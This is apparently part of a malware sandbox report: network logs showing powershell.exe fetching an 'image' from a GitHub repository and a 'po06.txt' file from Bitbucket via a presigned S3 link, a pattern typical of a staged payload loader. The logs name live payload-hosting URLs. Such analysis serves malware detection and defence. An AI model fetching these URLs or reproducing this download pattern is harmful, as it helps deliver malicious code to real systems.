                                                        Oct 7, 2024 09:33:23.592797995 CEST4434976016.182.70.97192.168.2.6
                                                        Oct 7, 2024 09:33:23.592842102 CEST49760443192.168.2.616.182.70.97
                                                        Oct 7, 2024 09:33:23.592842102 CEST49760443192.168.2.616.182.70.97
                                                        Oct 7, 2024 09:33:23.593270063 CEST49760443192.168.2.616.182.70.97

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 7, 2024 09:33:16.301242113 CEST6397753192.168.2.61.1.1.1
                                                        Oct 7, 2024 09:33:16.307971954 CEST53639771.1.1.1192.168.2.6
                                                        Oct 7, 2024 09:33:21.055862904 CEST6120053192.168.2.61.1.1.1
                                                        Oct 7, 2024 09:33:21.062531948 CEST53612001.1.1.1192.168.2.6
                                                        Oct 7, 2024 09:33:22.267725945 CEST5392653192.168.2.61.1.1.1
                                                        Oct 7, 2024 09:33:22.289293051 CEST53539261.1.1.1192.168.2.6
                                                        Oct 7, 2024 09:33:43.916111946 CEST5358101162.159.36.2192.168.2.6
                                                        Oct 7, 2024 09:33:44.416160107 CEST5357653192.168.2.61.1.1.1
                                                        Oct 7, 2024 09:33:44.424261093 CEST53535761.1.1.1192.168.2.6

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 7, 2024 09:33:16.301242113 CEST192.168.2.61.1.1.10x4371Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:21.055862904 CEST192.168.2.61.1.1.10xcc35Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.267725945 CEST192.168.2.61.1.1.10x1bf2Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:44.416160107 CEST192.168.2.61.1.1.10x5c30Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 7, 2024 09:33:16.307971954 CEST1.1.1.1192.168.2.60x4371No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:16.307971954 CEST1.1.1.1192.168.2.60x4371No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:16.307971954 CEST1.1.1.1192.168.2.60x4371No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:16.307971954 CEST1.1.1.1192.168.2.60x4371No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:21.062531948 CEST1.1.1.1192.168.2.60xcc35No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:21.062531948 CEST1.1.1.1192.168.2.60xcc35No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:21.062531948 CEST1.1.1.1192.168.2.60xcc35No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-w.us-east-1.amazonaws.com16.182.70.97A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-w.us-east-1.amazonaws.com3.5.28.193A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-w.us-east-1.amazonaws.com52.216.249.76A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-w.us-east-1.amazonaws.com52.216.215.1A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-w.us-east-1.amazonaws.com3.5.25.131A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-w.us-east-1.amazonaws.com52.217.172.201A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-w.us-east-1.amazonaws.com54.231.224.49A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:22.289293051 CEST1.1.1.1192.168.2.60x1bf2No error (0)s3-w.us-east-1.amazonaws.com16.182.72.209A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:33:44.424261093 CEST1.1.1.1192.168.2.60x5c30Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • raw.githubusercontent.com
                                                        • bitbucket.org
                                                        • bbuseruploads.s3.amazonaws.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.649725185.199.111.1334435664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-07 07:33:16 UTC117OUTGET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1
                                                        Host: raw.githubusercontent.com
                                                        Connection: Keep-Alive
                                                        2024-10-07 07:33:17 UTC887INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 2578503
                                                        Cache-Control: max-age=300
                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                        Content-Type: image/jpeg
                                                        ETag: "ba4b733aa1ad403bc9cacb2a172994a886bea7b08e7a7dfb33ae1618861cbf3e"
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: deny
                                                        X-XSS-Protection: 1; mode=block
                                                        X-GitHub-Request-Id: C0A1:9717F:209D27:231F7D:67038EBC
                                                        Accept-Ranges: bytes
                                                        Date: Mon, 07 Oct 2024 07:33:16 GMT
                                                        Via: 1.1 varnish
                                                        X-Served-By: cache-ewr-kewr1740073-EWR
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1728286397.890157,VS0,VE77
                                                        Vary: Authorization,Accept-Encoding,Origin
                                                        Access-Control-Allow-Origin: *
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        X-Fastly-Request-ID: 55472cea01be5c2ea00f60986e895ff7e260b055
                                                        Expires: Mon, 07 Oct 2024 07:38:16 GMT
                                                        Source-Age: 0
                                                        2024-10-07 07:33:17 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01
                                                        Data Ascii: JFIF,,ExifMM*CCp"_!
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 24 18 1e 91 51 6f 5a c4 83 c0 9a 67 14 d0 b7 13 58 bc c9 51 49 0b 24 fe 82 ac 98 bc c8 5a 09 07 9e dc d5 02 dd e2 d3 9d e0 fd 4d 4e e3 ef c0 48 f3 07 cc 71 55 ad a7 82 c4 2d 34 4c 65 ef 88 13 f3 00 a1 c8 9a 9b c6 e4 4a 09 2a 50 93 c5 67 b8 dc d4 04 93 bb 81 e6 6a 7a cb 32 1c 03 9e 3b 1a ca bb 4b f2 5c ae ec 17 66 6f d2 e2 c9 07 81 db 9a 77 6d 91 9e 27 81 ef 55 16 72 68 20 6d 51 e0 53 db 5c 9e c5 70 7b f7 ac eb 34 a5 c8 5c 99 72 b6 c9 a5 6a 09 dd 13 db 9a 92 b1 c8 04 b8 08 51 1e 51 35 4d b4 c9 25 6a 32 44 cf 11 52 56 b9 12 81 24 f3 ea 6b 3e dd 31 34 6d 45 da cf 20 82 a0 24 26 7d 2a 4e de e4 00 40 33 f9 d5 22 cb 2a 54 52 b2 b1 c1 a9 cc 7e 60 38 90 24 92 0f 27 da b3 ed d3 63 82 c2 b0 b2 b6 f9 09 10 7b 89 26 69 eb 37 90 00 2a 9e 3e 95 5f 62 ed 25 00 85 73 e5
                                                        Data Ascii: $QoZgXQI$ZMNHqU-4LeJ*Pgjz2;K\fowm'Urh mQS\p{4\rjQQ5M%j2DRV$k>14mE $&}*N@3"*TR~`8$'c{&i7*>_b%s
                                                        2024-10-07 07:33:17 UTC1378INData Raw: d3 36 fb 95 ce d3 e7 dc d1 db 67 fa 7c 8f 9d 42 e5 82 45 1c 8d 9a b4 51 50 e6 38 a5 3e e4 4a 7c b9 ef ef 4f 19 68 25 24 9f 2e dc d1 cb 32 92 02 b7 03 dc 11 11 4d 91 da c7 04 63 d6 9c 92 08 ef 13 4c ee 99 da 24 80 ae fd 8d 4a dc 32 12 83 c7 3d a3 bd 47 df c0 90 0c 77 f6 a9 ea 7d 88 e5 f8 2b 59 44 43 ca 06 15 35 0e f3 24 dc 42 40 ef 56 1c 9b 33 bb 90 66 a2 14 d0 4a b9 24 41 e6 2b 42 a9 60 83 01 98 64 18 22 02 92 3f 4a 92 b2 b5 da 67 ba 7b c7 95 34 b7 46 e5 90 07 35 25 6a df 1e fe d4 ac 7c 88 70 cb 13 12 39 fa d4 a5 83 40 24 13 c1 9a 67 6e 81 c9 90 94 f1 52 56 ed a4 01 04 89 20 fe 95 42 d6 4d 0e e4 a6 3f 97 01 3c c1 e0 d4 e6 39 3f cc 9d c4 8f 7a 81 b3 3b 52 23 cf f2 a9 9c 59 da b1 ef 59 97 47 25 98 48 b0 32 90 1a 04 7f ed a3 bc 99 41 88 07 d6 9b 5b bf bd 20
                                                        Data Ascii: 6g|BEQP8>J|Oh%$.2McL$J2=Gw}+YDC5$B@V3fJ$A+B`d"?Jg{4F5%j|p9@$gnRV BM?<9?z;R#YYG%H2A[
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 8e 4a 64 d7 92 d8 9e f0 45 33 42 12 f0 c9 23 88 9f 78 a3 a2 dc 92 78 fd e9 54 b4 24 19 3f 4a 55 b6 b6 aa 3f 3a 61 2e e3 74 5b 13 27 b7 95 1c 5b d3 94 b1 c7 3c c7 bd 1d 0c 00 a1 00 8a 61 f0 34 16 b0 8f 51 33 47 4b 45 24 1e 38 e3 eb 4e 9b b6 fa 8f de 8c 2d 79 fe 93 f5 a6 ca 1d 44 41 0c 00 92 3c cc d3 86 d9 26 38 ef 47 43 1e 7e 54 b2 59 00 8e 60 9a 8e 4c 20 5b 66 12 27 bd 2c da 4e d1 20 40 f7 af 36 80 90 47 04 fb 9e d4 a3 68 fe 58 93 1e f5 14 98 85 19 1c cf 03 e9 4a 34 9e 3d 7d 3e 94 54 20 05 7e 5e bc 52 ed 08 1c 77 a8 98 85 52 9f 98 79 4d 2e d9 db 3e 54 92 47 cf f9 52 81 3f 28 f5 91 4c 21 64 02 76 82 4f d6 3b 52 cd 88 4c 70 07 bd 26 d2 78 1f 48 a5 d9 4c 9f 38 ef 4b 3e 07 4c 59 a4 46 de 07 f9 52 88 68 11 07 88 33 e9 45 68 02 07 a8 a5 db 4c 02 01 35 13 ee 12
                                                        Data Ascii: JdE3B#xxT$?JU?:a.t['[<a4Q3GKE$8N-yDA<&8GC~TY`L [f',N @6GhXJ4=}>T ~^RwRyM.>TGR?(L!dvO;RLp&xHL8K>LYFRh3EhL5
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 95 3f 71 a0 a0 48 ef f5 a6 eb 42 52 0f 3c 1e e6 6a 64 c6 19 b8 90 90 67 f4 f2 a4 96 ce d8 e0 71 c5 3b 5b 61 20 9f 23 c0 a4 d6 d0 28 10 7c fb cd 16 46 68 68 b6 41 41 f9 79 f4 9e d4 9a 98 f2 20 03 dc 0a 78 a6 46 d2 00 04 0f 32 4d 26 e3 5b bb 00 67 f6 a2 c8 29 7c 8d 14 d9 90 08 04 1e 68 a5 8e f1 00 27 9a 74 2d c8 32 41 8f 28 f2 af 1b 71 23 eb cd 3e e1 34 35 f0 26 47 12 3d 3c e8 a1 93 b4 f0 29 e1 b7 f9 b8 3d bb f1 44 5b 69 4a 79 54 d2 c8 d8 1a 86 bf 98 78 1c 9a 21 47 ca 0c f7 34 ec b7 24 41 fa 99 e0 d1 54 da 60 fa 0a 25 2f 91 f0 86 c1 82 7b 89 99 ee 68 85 8d d3 f5 a7 7f 77 24 9e 3c a2 7d 6b ce 31 02 79 81 4e 98 b0 30 fb b6 d5 a7 ce 8a ab 7d 80 9f 39 fd 29 f1 64 2d 5c 72 12 68 0b 30 4c f6 34 fb 86 23 9e 60 01 c8 1c 7b 52 4b 60 02 60 77 fa f1 52 6e 5b ed 20 77
                                                        Data Ascii: ?qHBR<jdgq;[a #(|FhhAAy xF2M&[g)|h't-2A(q#>45&G=<)=D[iJyTx!G4$AT`%/{hw$<}k1yN0}9)d-\rh0L4#`{RK``wRn[ w
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 3e b6 70 73 07 cb 9a 8e 6d 44 79 4d 38 b7 70 c4 81 07 fb d4 6d 06 4b 5a be 5b 3c 49 9e 40 9a 9e c5 27 e5 49 51 12 07 61 55 76 6e 36 41 1e 5e 95 31 8f bf de 90 07 11 e8 6a bd 8b e0 24 c9 f1 0a 71 04 76 3d c5 3e b6 64 a8 48 24 01 e9 51 b8 fb b4 ba be 47 20 7a d4 8b 4f 04 98 98 3f 5a 81 a6 10 f4 38 10 60 99 a2 15 00 66 7b f3 49 3a ec f1 27 f2 ed 44 2e 84 cc 77 a8 c9 32 1d d5 02 a9 f2 3c 53 75 10 41 f2 22 85 6e 40 04 77 f7 a4 d6 e6 e1 db bf 07 da 90 84 d6 42 79 3e 73 34 92 d4 53 13 dc 8e d4 67 7f 01 e4 71 48 ba a9 51 24 89 ed 1e b4 84 11 c5 cc 9a 49 c5 03 04 9e dc 51 d6 24 11 c5 22 e7 2a 1c 0f d6 90 32 00 ae 24 99 91 e5 49 a9 41 07 82 4c 9f 5a f1 30 99 9e 4d 26 a5 98 82 3b d1 a5 80 41 71 72 a3 c9 fd 68 8b 7a 04 49 8a 05 9d d3 fa f1 49 19 0a 04 76 f5 f4 a2 4b
                                                        Data Ascii: >psmDyM8pmKZ[<I@'IQaUvn6A^1j$qv=>dH$QG zO?Z8`f{I:'D.w2<SuA"n@wBy>s4SgqHQ$IQ$"*2$IALZ0M&;AqrhzIIvK
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 10 80 b2 3e 6a 14 88 10 4c 81 42 e2 1a 90 a2 49 1b 61 52 93 ef 4e 1a 74 25 60 cc 73 c5 32 4a 22 61 71 3e 86 8e d1 da a0 93 c9 ee 2a 37 5f 04 b1 b0 95 b7 c9 a9 b5 94 a0 c0 1d f9 ef 56 0c 46 66 52 01 5c 71 54 e4 a9 53 cc 83 e4 69 7b 7b d5 b0 a1 27 b7 bd 54 9d 09 f6 2c 43 53 8e e5 f9 19 14 bb dd 52 0f 7e 4d 11 57 28 1d 88 91 ef 55 5b 2c ea e4 c9 3c 0f 5a 92 b6 bd 0e b6 92 4f 33 eb 54 e5 43 45 b5 a8 52 e0 97 45 c6 e5 c7 63 e5 e9 14 72 0a 92 62 3b cd 46 26 f8 23 cf b7 94 f7 a5 d9 c8 c9 f2 8f de a1 75 70 49 1b 18 f9 2e c4 47 04 f7 e4 d7 ad 32 4e 33 76 02 56 a2 27 8a 6a a7 cb 84 c9 20 0e c4 77 a5 59 28 2a 04 9e 0f 78 10 47 bd 41 3a 89 e1 63 2f 18 3c a7 de 6d 80 57 70 39 9a 7e eb a7 67 f2 ff 00 0a 6a b3 8c bf 09 60 00 40 80 05 4b d9 e5 00 24 6f 91 e9 da b3 ed a7
                                                        Data Ascii: >jLBIaRNt%`s2J"aq>*7_VFfR\qTSi{{'T,CSR~MW(U[,<ZO3TCEREcrb;F&#upI.G2N3vV'j wY(*xGA:c/<mWp9~gj`@K$o
                                                        2024-10-07 07:33:17 UTC1378INData Raw: bb 6e 1c 52 88 91 ed 48 38 c4 0f 41 52 ae da 11 3c f7 a4 57 6b b4 73 24 cd 4f 19 11 b8 fc 91 2e 5b 85 15 79 1a 6b 73 6f 06 23 89 e2 a5 dd b6 85 1e f1 ed 4d 2e ed ca 93 31 31 d8 0a b5 5c f2 41 35 82 19 6d 92 a2 00 04 77 92 69 25 33 12 26 7f 3e d4 fe e2 d3 69 31 22 69 aa db d8 b1 c4 03 e7 da ad 42 5c 11 31 a2 db da a0 7b 01 db de a2 b3 03 74 93 cc 9a 97 b8 4c 24 f2 60 7f f2 35 17 91 40 58 3f e5 57 2b 21 97 62 05 c6 a1 c5 12 20 1f 4a 21 82 78 23 89 a7 57 8d 02 a1 06 62 9a b8 12 8f c3 03 cb 8f 3a d0 af b1 08 d5 c7 c7 8e 11 24 10 3d 38 a5 90 b1 20 48 ed eb 49 bc 80 ae 49 e7 eb 48 1b 8f 09 64 00 0c 7b c7 ef 53 a4 03 ee 3b 2b 85 f0 af 3e d4 76 9d 1b 7b 83 f4 f2 f6 a6 0b bd 95 4f cb cf d6 bd f7 a2 be c7 8f 21 d8 d1 6d 18 94 49 49 5f 24 09 ed 4b b0 a0 a5 41 3f 32
                                                        Data Ascii: nRH8AR<Wks$O.[ykso#M.11\A5mwi%3&>i1"iB\1{tL$`5@X?W+!b J!x#Wb:$=8 HIIHd{S;+>v{O!mII_$KA?2
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 3f b5 18 2b bc f6 a8 da f9 16 47 0d ac 6e 03 fa 69 56 57 dc 83 04 18 34 d8 28 20 00 49 1e 74 b0 54 2b b4 45 03 58 09 31 c2 14 0a 07 90 a5 d0 ae 4f 95 35 4a a4 7d 7f 7a 55 2a 93 1f bd 03 09 34 3a 42 e5 30 3b 93 cd 28 95 10 78 33 14 d9 b5 40 e0 c1 14 aa 54 24 fa 8f 5a 58 10 e1 b3 b7 ce 67 f2 a5 52 e7 3c 02 60 f9 53 54 ab cb bf b4 c5 2a 90 01 f2 83 ef 34 d8 10 bb 6a 80 79 e4 51 8f cc 41 fc e9 10 41 12 3c fd e9 44 90 63 c8 c4 9f f4 a6 7d b0 23 d1 25 5d f8 f7 ef 47 e3 68 af 22 3b c0 04 fa d1 86 d2 3b a6 83 68 80 42 8f a7 71 3d e9 4a 22 40 e4 00 3c c5 1b 77 27 91 34 62 0a 55 27 b4 48 a2 a1 26 62 40 8e 38 a5 76 89 07 89 14 55 40 24 7f d2 90 82 44 93 c0 fa d0 29 a0 7b 44 f9 51 f6 03 e9 35 ef 0a 3f aa 69 26 21 12 80 13 27 99 1e bd e8 54 c8 13 3e 7e 54 b1 40 88 f9
                                                        Data Ascii: ?+GniVW4( ItT+EX1O5J}zU*4:B0;(x3@T$ZXgR<`ST*4jyQAA<Dc}#%]Gh";;hBq=J"@<w'4bU'H&b@8vU@$D){DQ5?i&!'T>~T@
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 41 23 ca 8c 1d 05 3c 18 33 14 44 93 34 1d bd c7 a5 30 85 12 b1 30 a5 1e 3f 4a 38 56 e4 81 c7 14 88 85 7c aa 23 8f 5e c6 8c 95 80 38 23 f2 a5 81 64 5f 77 b8 a2 ee e6 29 30 e9 3b 62 62 6b c8 78 83 c8 e6 69 0b 2f c0 af cb b6 37 76 f6 a3 12 12 3b 9f a5 25 b8 ab 90 27 8f 5a 12 e4 00 20 c5 2e 3c 8e a4 c3 a8 84 09 92 68 15 09 04 03 df da 8a 54 20 c8 91 ee 68 a5 7e a3 f2 a7 e3 c0 fb 83 a8 f3 cc fb d1 16 a0 0c 02 4f ed 5e 52 80 4f 30 7e b4 91 5e d3 db b1 a6 19 b0 54 a0 39 07 b7 94 51 54 47 3c f7 34 05 5e 87 bd 11 4a 1b a0 77 34 86 c8 68 f5 fa 77 ef 49 ba 47 20 f9 d0 a9 65 22 7f 6a 49 6b e7 d7 db d2 9d 21 09 38 47 ac c5 37 74 00 47 33 12 69 57 48 3e 5c 76 22 90 58 f2 f2 3c 77 a2 42 1b 3b 11 04 09 a4 5c 02 0f b5 2e e1 32 63 69 fa d2 0e 73 23 c8 fe f5 24 44 35 58 e0
                                                        Data Ascii: A#<3D400?J8V|#^8#d_w)0;bbkxi/7v;%'Z .<hT h~O^RO0~^T9QTG<4^Jw4hwIG e"jIk!8G7tG3iWH>\v"X<wB;\.2cis#$D5X


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.649752185.166.143.484435664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-07 07:33:21 UTC100OUTGET /rulmerurk/ertertqw/downloads/po06.txt HTTP/1.1
                                                        Host: bitbucket.org
                                                        Connection: Keep-Alive
                                                        2024-10-07 07:33:22 UTC5118INHTTP/1.1 302 Found
                                                        Date: Mon, 07 Oct 2024 07:33:22 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 0
                                                        Server: AtlassianEdge
                                                        Location: https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-44b3-9024-14d063289113/po06.txt?response-content-disposition=attachment%3B%20filename%3D%22po06.txt%22&AWSAccessKeyId=ASIA6KOSE3BNNNEIOJI2&Signature=fCrW6YnKz8vmM76pCMU1Lk6%2B0dU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEND%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICDb1Ea51gVsaGyPokV768I%2BK7TQ4cMsw7V4s%2FwUh97nAiBfdiFFLnmsdf8uWYy0kPYgU%2BjMX%2FMgGviikn58Zb6gxSqnAggpEAAaDDk4NDUyNTEwMTE0NiIMEI%2Blc%2FDMHYEVRHAGKoQCqgEqCyiV%2B3l1ji%2BADbqxjQAkgbvr1wtWBW6I%2Bw1MhCD7Mxv3%2FnNWt0uV09RjUnN81299oEf01aBbcdjn3LrJzVv26PtJlSKA4XjDjqHgt4WeXq%2F%2F7hJG0lFt4RXCCuJfQAEzhCNvyxwS3W5h8kafeCHdboWlzk8hyBUMfK0fthLTcWdKoCk30MyOhCiCmW%2BRSyT76Oe%2B8IBbx%2BUcOZRFmnl4rOdx52%2BSbzegdvcQ%2Bkh1z8AYQYnRivhT30A68B9NHLHz%2BuOQbnY6gwwwc1%2FyoVHP99bN6P2wqC9yeGkEPPkenaL1k0WzLcky5ZyHMjM09U2H3sUzWWlYKmC9oxgP8RlWKagw%2F5mOuAY6ngFo9w%2BuVBeGNn0os%2F2bZJZ9Z%2BD0%2B8YeClr2VvBYCCC1utxLfr9vLLLpP2dO9iTdu0Tdh13%2B8JebIVXg3As%2BHgx7cfu [TRUNCATED]
                                                        Expires: Mon, 07 Oct 2024 07:33:22 GMT
                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                        X-Used-Mesh: False
                                                        Vary: Accept-Language, Origin
                                                        Content-Language: en
                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                        X-Dc-Location: Micros-3
                                                        X-Served-By: 61e51e47dd6f
                                                        X-Version: 8e66bccd2be3
                                                        X-Static-Version: 8e66bccd2be3
                                                        X-Request-Count: 1116
                                                        X-Render-Time: 0.046785831451416016
                                                        X-B3-Traceid: 0808a1647fb24c5cafa43d7dd1facf45
                                                        X-B3-Spanid: 707e33c580f68fff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassi [TRUNCATED]
                                                        X-Usage-Quota-Remaining: 999227.518
                                                        X-Usage-Request-Cost: 786.33
                                                        X-Usage-User-Time: 0.016543
                                                        X-Usage-System-Time: 0.007047
                                                        X-Usage-Input-Ops: 0
                                                        X-Usage-Output-Ops: 0
                                                        Age: 0
                                                        X-Cache: MISS
                                                        X-Content-Type-Options: nosniff
                                                        X-Xss-Protection: 1; mode=block
                                                        Atl-Traceid: 0808a1647fb24c5cafa43d7dd1facf45
                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                        Server-Timing: atl-edge;dur=157,atl-edge-internal;dur=4,atl-edge-upstream;dur=155,atl-edge-pop;desc="aws-eu-central-1"
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.64976016.182.70.974435664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-07 07:33:22 UTC1211OUTGET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-44b3-9024-14d063289113/po06.txt?response-content-disposition=attachment%3B%20filename%3D%22po06.txt%22&AWSAccessKeyId=ASIA6KOSE3BNNNEIOJI2&Signature=fCrW6YnKz8vmM76pCMU1Lk6%2B0dU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEND%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICDb1Ea51gVsaGyPokV768I%2BK7TQ4cMsw7V4s%2FwUh97nAiBfdiFFLnmsdf8uWYy0kPYgU%2BjMX%2FMgGviikn58Zb6gxSqnAggpEAAaDDk4NDUyNTEwMTE0NiIMEI%2Blc%2FDMHYEVRHAGKoQCqgEqCyiV%2B3l1ji%2BADbqxjQAkgbvr1wtWBW6I%2Bw1MhCD7Mxv3%2FnNWt0uV09RjUnN81299oEf01aBbcdjn3LrJzVv26PtJlSKA4XjDjqHgt4WeXq%2F%2F7hJG0lFt4RXCCuJfQAEzhCNvyxwS3W5h8kafeCHdboWlzk8hyBUMfK0fthLTcWdKoCk30MyOhCiCmW%2BRSyT76Oe%2B8IBbx%2BUcOZRFmnl4rOdx52%2BSbzegdvcQ%2Bkh1z8AYQYnRivhT30A68B9NHLHz%2BuOQbnY6gwwwc1%2FyoVHP99bN6P2wqC9yeGkEPPkenaL1k0WzLcky5ZyHMjM09U2H3sUzWWlYKmC9oxgP8RlWKagw%2F5mOuAY6ngFo9w%2BuVBeGNn0os%2F2bZJZ9Z%2BD0%2B8YeClr2VvBYCCC1utxLfr9vLLLpP2dO9iTdu0Tdh13%2B8JebIVXg3As%2BHgx7cfu0QDWzRjYpiFcJf1LqlV%2BkrHMKyohVoC%2FlxeRSvJA [TRUNCATED]
                                                        Host: bbuseruploads.s3.amazonaws.com
                                                        Connection: Keep-Alive
                                                        2024-10-07 07:33:23 UTC523INHTTP/1.1 200 OK
                                                        x-amz-id-2: lpOZKJ1koLdC2uzcmaChljIOh7bl/YvMqXXACFXgBRJizZMQ0gRH+W9fqfVHVj8oTTCSZGzbjkQ=
                                                        x-amz-request-id: QNRNG3NJ4WTVTVK1
                                                        Date: Mon, 07 Oct 2024 07:33:23 GMT
                                                        Last-Modified: Sun, 06 Oct 2024 19:44:00 GMT
                                                        ETag: "25ed80d3edc48423314bfde9f7f6a668"
                                                        x-amz-server-side-encryption: AES256
                                                        x-amz-version-id: C6L29JZ7e76hnMP4VYZTCoElKv867tPG
                                                        Content-Disposition: attachment; filename="po06.txt"
